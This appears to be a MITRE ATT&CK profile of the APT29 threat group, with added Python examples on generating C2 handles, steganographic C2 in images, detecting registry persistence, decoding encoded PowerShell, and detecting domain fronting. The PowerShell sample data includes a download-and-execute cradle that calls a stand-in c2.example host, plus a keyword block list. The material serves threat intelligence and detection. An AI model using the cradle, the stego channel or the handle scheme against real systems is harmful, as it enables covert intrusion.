APT29

APT29 is a threat group that has been attributed to the Russian government and has operated since at least 2008.[1][2] This group reportedly compromised the Democratic National Committee starting in the summer of 2015.[3]

ID: G0016
Associated Groups: YTTRIUM, The Dukes, Cozy Bear, CozyDuke
Version: 1.4
Created: 31 May 2017
Last Modified: 22 October 2020

Associated Group Descriptions

Name Description
YTTRIUM [4]
The Dukes [1][5][6]
Cozy Bear [3][5][6]
CozyDuke [3]

Techniques Used

Domain ID Name Use
Enterprise T1548 .002 Abuse Elevation Control Mechanism: Bypass User Account Control

APT29 has bypassed UAC.[7]

Enterprise T1583 .006 Acquire Infrastructure: Web Services

APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware, such as HAMMERTOSS.[8]
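
The rendezvous idea behind algorithmically generated handles, as an added example that is not from this page or from HAMMERTOSS (the page does not describe the real algorithm): implant and operator both derive the day's handle from the date and a shared seed, so the operator can register accounts ahead of time and the implant carries no fixed C2 address. The seed, alphabet and handle length below are assumptions of this example. The same precomputation serves a defender who has recovered the algorithm from a sample and wants to register, monitor or block the upcoming handles first.

```python
import hashlib
from datetime import date, timedelta
from typing import List

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"
SEED = b"constructed-example-seed"   # assumption: shared secret compiled into the implant
HANDLE_LEN = 12                      # Twitter handles are at most 15 characters


def handle_for(day: str, seed: bytes = SEED) -> str:
    """Derive the rendezvous handle for one day given as "YYYY-MM-DD".

    Hypothetical scheme: SHA-256 over seed || date, mapped onto the handle
    alphabet. The byte % 36 mapping is slightly biased, which is harmless for
    a rendezvous name but not acceptable where uniform randomness matters.
    """
    digest = hashlib.sha256(seed + day.encode()).digest()
    first = ALPHABET[digest[0] % 26]  # letters only, so the handle never starts with a digit
    rest = "".join(ALPHABET[b % len(ALPHABET)] for b in digest[1:HANDLE_LEN])
    return first + rest


def upcoming_handles(start: str, days: int, seed: bytes = SEED) -> List[str]:
    """Precompute the next `days` handles beginning at `start`.

    The operator uses this list to register accounts in advance; a defender
    who has extracted the seed and algorithm from a sample uses the same list
    to claim or block the accounts before the implant looks for them.
    """
    d0 = date.fromisoformat(start)
    return [handle_for((d0 + timedelta(days=i)).isoformat(), seed) for i in range(days)]


if __name__ == "__main__":
    for h in upcoming_handles("2015-07-29", 7):
        print(h)
```

Because both sides only need the date and the seed, no C2 address appears in the binary or on the wire until the handle is resolved; the detection opportunity is the algorithm itself, which is why recovering it from a sample is worth the reverse-engineering effort.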

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

APT29 added Registry Run keys to establish persistence.[7]

Enterprise T1547 .009 Boot or Logon Autostart Execution: Shortcut Modification

APT29 drops a Windows shortcut file for execution.[9]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke. APT29 also used PowerShell scripts to evade defenses.[10][7][9]

Enterprise T1059 .006 Command and Scripting Interpreter: Python

APT29 has developed malware variants written in Python.[5]

Enterprise T1001 .002 Data Obfuscation: Steganography

APT29 has used steganography to hide C2 communications in images.[5]
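
An added example, not HAMMERTOSS code or anything taken from this page, of the mechanism behind T1001.002: a command is written into the least significant bit of each colour byte of a carrier image and later read back using a small frame (marker, length, payload, CRC). The carrier is a constructed pixel buffer standing in for the decoded pixels of a PNG; the `MAGIC` marker and frame layout are assumptions of this example, not the real malware's format.

```python
import struct
import zlib
from typing import Optional

# Constructed carrier: a flat RGB pixel buffer standing in for a decoded image.
# No image library is used so the example runs offline; in practice the carrier
# would be the pixel data of an image fetched from a web service.
WIDTH, HEIGHT = 64, 32
CARRIER = bytearray((x * 7 + y * 13 + c * 31) & 0xFF
                    for y in range(HEIGHT) for x in range(WIDTH) for c in range(3))

MAGIC = b"C2"  # assumption: marker so the extractor can tell a carrier from any other image


def capacity(pixels: bytes) -> int:
    """Payload bytes the carrier can hold at one bit per channel byte."""
    return len(pixels) // 8


def embed(pixels: bytes, payload: bytes) -> bytearray:
    """Hide payload in the LSB of each channel byte.

    Frame layout: MAGIC | u32 length | payload | crc32(payload), MSB-first,
    one bit per byte of the carrier, so each altered byte changes by at most 1.
    """
    frame = MAGIC + struct.pack(">I", len(payload)) + payload + struct.pack(">I", zlib.crc32(payload))
    if len(frame) > capacity(pixels):
        raise ValueError("payload too large for carrier")
    out = bytearray(pixels)
    for i, byte in enumerate(frame):
        for bit in range(8):
            pos = i * 8 + bit
            out[pos] = (out[pos] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return out


def _read_bytes(pixels: bytes, offset: int, n: int) -> bytes:
    """Reassemble n bytes starting at byte offset `offset` of the hidden frame."""
    out = bytearray()
    for i in range(n):
        byte = 0
        for bit in range(8):
            byte = (byte << 1) | (pixels[(offset + i) * 8 + bit] & 1)
        out.append(byte)
    return bytes(out)


def extract(pixels: bytes) -> Optional[bytes]:
    """Recover the payload, or None if the image carries no valid frame."""
    if capacity(pixels) < len(MAGIC) + 8 or _read_bytes(pixels, 0, len(MAGIC)) != MAGIC:
        return None
    (length,) = struct.unpack(">I", _read_bytes(pixels, len(MAGIC), 4))
    if len(MAGIC) + 4 + length + 4 > capacity(pixels):
        return None  # a random image that happened to match MAGIC
    payload = _read_bytes(pixels, len(MAGIC) + 4, length)
    (crc,) = struct.unpack(">I", _read_bytes(pixels, len(MAGIC) + 4 + length, 4))
    return payload if crc == zlib.crc32(payload) else None


def lsb_changed(before: bytes, after: bytes) -> int:
    """Count channel bytes that differ: at most one bit each, invisible to the
    eye, but a statistical footprint that LSB-stego detectors look for."""
    return sum(1 for a, b in zip(before, after) if a != b)


if __name__ == "__main__":
    stego = embed(CARRIER, b"tasklist /v")  # constructed command
    print(extract(stego), lsb_changed(CARRIER, stego), "bytes touched")
```

The frame makes the scheme robust for the operator (a wrong or re-encoded image simply fails the marker or CRC) and explains why such traffic looks like ordinary image downloads: nothing in the HTTP exchange differs from fetching any other picture.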

Enterprise T1587 .003 Develop Capabilities: Digital Certificates

APT29 has created self-signed digital certificates to enable mutual TLS authentication for malware.[11][12]

Enterprise T1546 .008 Event Triggered Execution: Accessibility Features

APT29 used the Sticky Keys accessibility feature to obtain unauthenticated, privileged console access.[7][13]
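
The Run key persistence and the Sticky Keys hijack above can both be audited from a `reg export` of the relevant hives. The following is an added example, not from this page or from any APT29 sample, that parses the .reg text format and flags a Debugger value under Image File Execution Options for an accessibility binary (the mechanism that turns sethc.exe at the logon screen into a SYSTEM shell) and Run entries that launch proxy binaries or point into user-writable paths. The .reg sample is constructed; `ACCESSIBILITY_BINARIES` lists the Windows accessibility helpers reachable before logon, and the path and binary patterns are this example's heuristics.

```python
import re
from typing import Iterator, List, NamedTuple, Tuple

# Constructed .reg export (the format written by `reg export`), not data from a
# real incident: an IFEO debugger on sethc.exe, a benign Run entry, and a Run
# entry that uses rundll32 to load a DLL from the user's profile.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="rundll32.exe C:\\Users\\alice\\AppData\\Roaming\\svc.dll,Start"
"""

# Accessibility helpers Windows launches from the logon screen; a Debugger value
# under their IFEO key runs the named program instead, as SYSTEM, with no logon.
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe"}
USER_WRITABLE = re.compile(r"\\(users|appdata|temp|programdata|public)\\", re.I)
PROXY_BINARIES = re.compile(r"\b(rundll32|regsvr32|mshta|powershell|pwsh|wscript|cscript|cmd)(\.exe)?\b", re.I)
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


class Finding(NamedTuple):
    kind: str
    key: str
    name: str
    value: str


def unescape(raw: str) -> str:
    """Undo .reg string escaping: \\ becomes \ and \" becomes a quote."""
    return re.sub(r'\\(["\\])', r"\1", raw)


def parse_reg(text: str) -> Iterator[Tuple[str, str, str]]:
    """Yield (key, value_name, value) for REG_SZ values; other types are skipped."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and (m := VALUE_LINE.match(line)):
            name, data = m.group(1), m.group(2)
            if data.startswith('"') and data.endswith('"'):
                yield key, unescape(name), unescape(data[1:-1])


def scan_reg(text: str) -> List[Finding]:
    """Flag IFEO debuggers (any, with accessibility binaries called out) and
    Run/RunOnce entries that use proxy binaries or user-writable locations."""
    findings: List[Finding] = []
    for key, name, value in parse_reg(text):
        parts = key.split("\\")
        if len(parts) > 1 and parts[-2].lower() == "image file execution options" and name.lower() == "debugger":
            kind = "ifeo-accessibility-debugger" if parts[-1].lower() in ACCESSIBILITY_BINARIES else "ifeo-debugger"
            findings.append(Finding(kind, key, name, value))
        elif parts[-1].lower() in ("run", "runonce") and (USER_WRITABLE.search(value) or PROXY_BINARIES.search(value)):
            findings.append(Finding("run-key-suspicious", key, name, value))
    return findings


if __name__ == "__main__":
    for f in scan_reg(SAMPLE_REG):
        print(f.kind, "|", f.key, "|", f.name, "=", f.value)
```

The IFEO check needs no allowlist: a Debugger on an accessibility binary has no legitimate production use. The Run key heuristic will surface benign software that lives in user profiles, so it is a triage queue rather than a verdict; the replaced-binary variant of the Sticky Keys attack (overwriting sethc.exe itself) is not visible in the registry and needs a file hash or signature comparison instead.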

Enterprise T1546 .003 Event Triggered Execution: Windows Management Instrumentation Event Subscription

APT29 has used WMI to establish persistence.[7][5]

Enterprise T1190 Exploit Public-Facing Application

APT29 has exploited CVE-2019-19781 in Citrix ADC and Gateway, CVE-2019-11510 in Pulse Secure VPNs, CVE-2018-13379 in FortiGate VPNs, and CVE-2019-9670 in Zimbra software to gain access.[6]

Enterprise T1203 Exploitation for Client Execution

APT29 has used multiple software exploits for common client software, like Microsoft Word and Adobe Reader, to gain code execution as part of.[1]

Enterprise T1070 .004 Indicator Removal on Host: File Deletion

APT29 used SDelete to remove artifacts from victims.[7]

Enterprise T1095 Non-Application Layer Protocol

APT29 uses TCP for C2 communications.[9]

Enterprise T1027 Obfuscated Files or Information

APT29 has used PowerShell to Base64-encode scripts and commands for obfuscation.[9]
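
PowerShell's -EncodedCommand switch takes the Base64 of the UTF-16LE script text, which is the form both the encoded scripts pushed to CozyCar hosts (T1059.001 above) and the Base64 obfuscation here refer to. The added example below, not from this page or from any APT29 tooling, decodes that form from process command lines and flags download-cradle and evasion switches in the result. The sample command lines, the indicator list and the c2.example hostname are constructed for this example.

```python
import base64
import re
from typing import List, NamedTuple, Optional

# -EncodedCommand and the abbreviations powershell.exe accepts for it (attackers
# favour -e, -ec and -enc); the argument is Base64 of the UTF-16LE script text.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Download-cradle and evasion indicators checked after decoding; constructed for
# this example, extend from your own telemetry.
SUSPICIOUS = re.compile(
    r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
    r"Invoke-Expression|\bIEX\b|FromBase64String|-nop\b|-w(?:indowstyle)?\s+hidden)", re.I)


def encode_command(script: str) -> str:
    """Produce the -EncodedCommand argument for a script (the attacker's side)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> Optional[str]:
    """Invert encode_command; None when the blob is not valid Base64 / UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


class Triage(NamedTuple):
    cmdline: str
    decoded: Optional[str]   # decoded script, or None if no encoded command was present
    indicators: List[str]    # distinct suspicious tokens from the outer switches and decoded text


def triage(cmdline: str) -> Triage:
    decoded, text = None, cmdline
    m = ENC_FLAG.search(cmdline)
    if m:
        decoded = decode_command(m.group(1))
        # scan the switches outside the blob plus the decoded script, not the Base64 itself
        text = cmdline[:m.start(1)] + (decoded or "")
    indicators = sorted({hit.group(0) for hit in SUSPICIOUS.finditer(text)}, key=str.lower)
    return Triage(cmdline, decoded, indicators)


def triage_all(cmdlines: List[str]) -> List[Triage]:
    """Return only the command lines that produced at least one indicator."""
    return [t for t in (triage(c) for c in cmdlines) if t.indicators]


# Constructed process command lines (Sysmon event 1 / Security 4688 style), not real telemetry.
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -Enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://c2.example/s.ps1')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    "powershell.exe -enc " + encode_command("Get-ChildItem C:\\Users"),
]

if __name__ == "__main__":
    for t in triage_all(SAMPLE_CMDLINES):
        print(t.indicators, "<-", t.decoded)
```

Decoding before matching matters: none of the cradle keywords appear in the Base64 text, so a rule that only inspects the raw command line sees an opaque blob. Script Block Logging (event 4104) records the decoded script as well, but process-creation telemetry is often all that is available for historical review.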

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

APT29 used UPX to pack files.[7]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.[1][9][5]

Enterprise T1566 .002 Phishing: Spearphishing Link

APT29 has used spearphishing emails containing a link to a ZIP archive of malicious files, relying on the victim to click the link.[7]

Enterprise T1090 .003 Proxy: Multi-hop Proxy

A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (NetBIOS), and 445 (SMB), enabling full remote access from outside the network.[7]

Enterprise T1090 .004 Proxy: Domain Fronting

APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.[7]
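
Domain fronting works because the TLS Server Name Indication, which any network sensor can read, names a permitted CDN front, while the HTTP Host header inside the encrypted session names the real backend the CDN forwards to. The added example below, not from this page or from meek, applies the standard counter-check to constructed flow records from a TLS-inspecting proxy: flag sessions whose Host header names a different site than the SNI. Hostnames are placeholders, and the registrable-domain comparison is a crude last-two-labels heuristic, as noted in the code.

```python
from typing import List, NamedTuple


class Flow(NamedTuple):
    src: str
    sni: str    # server name from the ClientHello, visible to any network sensor
    host: str   # Host header inside the decrypted request; needs TLS inspection to see


# Constructed flow records; hostnames are placeholders, not real infrastructure.
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "www.frontcdn.example", "www.frontcdn.example"),        # ordinary: SNI and Host agree
    Flow("10.0.0.5", "assets.frontcdn.example", "static.frontcdn.example"),  # sibling hosts of one site: tolerated
    Flow("10.0.0.7", "edge.frontcdn.example", "c2.hidden-origin.example"),   # fronted: CDN front vs. real backend
    Flow("10.0.0.9", "", "api.frontcdn.example"),                            # no SNI: nothing to compare
]


def registrable(name: str) -> str:
    """Crude site key: last two DNS labels, lower-cased, with port and trailing
    dot removed. A production check would consult the Public Suffix List."""
    name = name.lower().rstrip(".").split(":")[0]
    labels = [label for label in name.split(".") if label]
    return ".".join(labels[-2:])


def is_fronted(flow: Flow) -> bool:
    """True when the encrypted Host header names a different site than the SNI,
    the defining signature of domain fronting. Flows without an SNI or Host are
    not decidable by this check and are left to other rules."""
    if not flow.sni or not flow.host:
        return False
    return registrable(flow.sni) != registrable(flow.host)


def find_fronting(flows: List[Flow]) -> List[Flow]:
    return [f for f in flows if is_fronted(f)]


if __name__ == "__main__":
    for f in find_fronting(SAMPLE_FLOWS):
        print(f"{f.src}: SNI {f.sni!r} but Host {f.host!r}")
```

Without TLS inspection the only visible name is the SNI, which is exactly the allowed front, so the check cannot be run on passive metadata alone; this is what made the technique effective and why CDN providers later began rejecting SNI/Host mismatches at the edge.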

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

APT29 used named and hijacked scheduled tasks to establish persistence.[7]

Enterprise T1218 .011 Signed Binary Proxy Execution: Rundll32

APT29 has used rundll32.exe for execution.[9]

Enterprise T1550 .003 Use Alternate Authentication Material: Pass the Ticket

APT29 used Kerberos ticket attacks for lateral movement.[7]

Enterprise T1204 .002 User Execution: Malicious File

APT29 has used various forms of spearphishing attempting to get a user to open links or attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files.[1][9][5]

Enterprise T1078 .002 Valid Accounts: Domain Accounts

APT29 has used valid accounts, including administrator accounts, to help facilitate lateral movement on compromised networks.[5][6]

Enterprise T1102 .002 Web Service: Bidirectional Communication

APT29 has used social media platforms to hide communications to C2 servers.[5]

Enterprise T1047 Windows Management Instrumentation

APT29 used WMI to steal credentials and execute backdoors at a future time.[7]

Software

ID Name References Techniques
S0054 CloudDuke [1] Application Layer Protocol: Web Protocols, Ingress Tool Transfer, Web Service: Bidirectional Communication
S0154 Cobalt Strike [9] Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: Token Impersonation/Theft, Access Token Manipulation: Parent PID Spoofing, Access Token Manipulation: Make and Impersonate Token, Account Discovery: Domain Account, Application Layer Protocol, Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, BITS Jobs, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: Python, Commonly Used Port, Create or Modify System Process: Windows Service, Data from Local System, Exploitation for Privilege Escalation, Indicator Removal on Host: Timestomp, Input Capture: Keylogging, Man in the Browser, Multiband Communication, Native API, Network Service Scanning, Network Share Discovery, Obfuscated Files or Information: Indicator Removal from Tools, OS Credential Dumping: Security Account Manager, Process Discovery, Process Injection, Process Injection: Process Hollowing, Protocol Tunneling, Proxy: Internal Proxy, Remote Services: SMB/Windows Admin Shares, Remote Services: Windows Remote Management, Remote Services: SSH, Remote Services: Remote Desktop Protocol, Remote Services: Distributed Component Object Model, Remote System Discovery, Scheduled Transfer, Screen Capture, System Network Configuration Discovery, System Services: Service Execution, Use Alternate Authentication Material: Pass the Hash, Valid Accounts: Local Accounts, Valid Accounts: Domain Accounts, Windows Management Instrumentation
S0050 CosmicDuke [1] Application Layer Protocol: Web Protocols, Automated Exfiltration, Clipboard Data, Create or Modify System Process: Windows Service, Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Data from Local System, Data from Network Shared Drive, Data from Removable Media, Email Collection: Local Email Collection, Encrypted Channel: Symmetric Cryptography, Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Exploitation for Privilege Escalation, File and Directory Discovery, Input Capture: Keylogging, OS Credential Dumping: LSA Secrets, OS Credential Dumping: Security Account Manager, Scheduled Task/Job: Scheduled Task, Screen Capture
S0046 CozyCar [1] Application Layer Protocol: Web Protocols, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Create or Modify System Process: Windows Service, Masquerading: Rename System Utilities, Obfuscated Files or Information, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSASS Memory, Scheduled Task/Job: Scheduled Task, Signed Binary Proxy Execution: Rundll32, Software Discovery: Security Software Discovery, System Information Discovery, Virtualization/Sandbox Evasion, Web Service: Bidirectional Communication
S0049 GeminiDuke [1] Account Discovery: Local Account, Application Layer Protocol: Web Protocols, File and Directory Discovery, Process Discovery, System Network Configuration Discovery, System Service Discovery
S0037 HAMMERTOSS [1] Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: PowerShell, Data Obfuscation: Steganography, Encrypted Channel: Symmetric Cryptography, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Hide Artifacts: Hidden Window, Web Service: One-Way Communication
S0100 ipconfig [14] System Network Configuration Discovery
S0175 meek [7] Proxy: Domain Fronting
S0002 Mimikatz [1] Access Token Manipulation: SID-History Injection, Account Manipulation, Boot or Logon Autostart Execution: Security Support Provider, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores, OS Credential Dumping: LSASS Memory, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSA Secrets, Rogue Domain Controller, Steal or Forge Kerberos Tickets: Silver Ticket, Steal or Forge Kerberos Tickets: Golden Ticket, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket
S0051 MiniDuke [1][5] Application Layer Protocol: Web Protocols, Create or Modify System Process, Dynamic Resolution: Domain Generation Algorithms, Fallback Channels, File and Directory Discovery, Ingress Tool Transfer, Obfuscated Files or Information, Proxy: Internal Proxy, System Information Discovery, Web Service: Dead Drop Resolver
S0039 Net [14] Account Discovery: Local Account, Account Discovery: Domain Account, Create Account: Local Account, Create Account: Domain Account, Indicator Removal on Host: Network Share Connection Removal, Network Share Discovery, Password Policy Discovery, Permission Groups Discovery: Local Groups, Permission Groups Discovery: Domain Groups, Remote Services: SMB/Windows Admin Shares, Remote System Discovery, System Network Connections Discovery, System Service Discovery, System Services: Service Execution, System Time Discovery
S0052 OnionDuke [1][5] Application Layer Protocol: Web Protocols, Deobfuscate/Decode Files or Information, Endpoint Denial of Service, OS Credential Dumping, Web Service: One-Way Communication
S0048 PinchDuke [1] Application Layer Protocol: Web Protocols, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores, Data from Local System, File and Directory Discovery, OS Credential Dumping, System Information Discovery
S0518 PolyglotDuke [5] Application Layer Protocol: Web Protocols, Deobfuscate/Decode Files or Information, Ingress Tool Transfer, Modify Registry, Native API, Obfuscated Files or Information: Steganography, Obfuscated Files or Information, Signed Binary Proxy Execution: Rundll32, Web Service: Dead Drop Resolver
S0150 POSHSPY [15] Command and Scripting Interpreter: PowerShell, Data Transfer Size Limits, Dynamic Resolution: Domain Generation Algorithms, Encrypted Channel: Asymmetric Cryptography, Event Triggered Execution: Windows Management Instrumentation Event Subscription, Indicator Removal on Host: Timestomp, Ingress Tool Transfer, Obfuscated Files or Information
S0139 PowerDuke [16] Application Window Discovery, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Commonly Used Port, Data Destruction, File and Directory Discovery, Hide Artifacts: NTFS File Attributes, Indicator Removal on Host: File Deletion, Ingress Tool Transfer, Obfuscated Files or Information: Steganography, Process Discovery, Signed Binary Proxy Execution: Rundll32, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery, System Time Discovery
S0029 PsExec [1][5] Lateral Tool Transfer, Remote Services: SMB/Windows Admin Shares, System Services: Service Execution
S0511 RegDuke [5] Command and Scripting Interpreter: PowerShell, Deobfuscate/Decode Files or Information, Event Triggered Execution: Windows Management Instrumentation Event Subscription, Ingress Tool Transfer, Modify Registry, Obfuscated Files or Information: Steganography, Obfuscated Files or Information, Web Service: Bidirectional Communication
S0195 SDelete [7] Data Destruction, Indicator Removal on Host: File Deletion
S0053 SeaDuke [1] Application Layer Protocol: Web Protocols, Archive Collected Data: Archive via Library, Boot or Logon Autostart Execution: Shortcut Modification, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Data Encoding: Standard Encoding, Email Collection: Remote Email Collection, Encrypted Channel: Symmetric Cryptography, Event Triggered Execution: Windows Management Instrumentation Event Subscription, Indicator Removal on Host: File Deletion, Ingress Tool Transfer, Obfuscated Files or Information: Software Packing, Use Alternate Authentication Material: Pass the Ticket, Valid Accounts
S0516 SoreFang [6][14] Account Discovery: Local Account, Account Discovery: Domain Account, Application Layer Protocol: Web Protocols, Deobfuscate/Decode Files or Information, Exploit Public-Facing Application, File and Directory Discovery, Ingress Tool Transfer, Obfuscated Files or Information, Permission Groups Discovery: Domain Groups, Process Discovery, Scheduled Task/Job: Scheduled Task, System Information Discovery, System Network Configuration Discovery
S0096 Systeminfo [14] System Information Discovery
S0057 Tasklist [14] Process Discovery, Software Discovery: Security Software Discovery, System Service Discovery
S0183 Tor [7] Encrypted Channel: Asymmetric Cryptography, Proxy: Multi-hop Proxy
S0515 WellMail [17][6] Archive Collected Data, Data from Local System, Deobfuscate/Decode Files or Information, Encrypted Channel: Asymmetric Cryptography, Ingress Tool Transfer, Non-Application Layer Protocol, Non-Standard Port, System Network Configuration Discovery, System Owner/User Discovery
S0514 WellMess [11][12][18][6] Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: PowerShell, Data Encoding: Standard Encoding, Data from Local System, Data Obfuscation: Junk Data, Deobfuscate/Decode Files or Information, Encrypted Channel: Symmetric Cryptography, Encrypted Channel: Asymmetric Cryptography, Ingress Tool Transfer, Permission Groups Discovery: Domain Groups, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery

References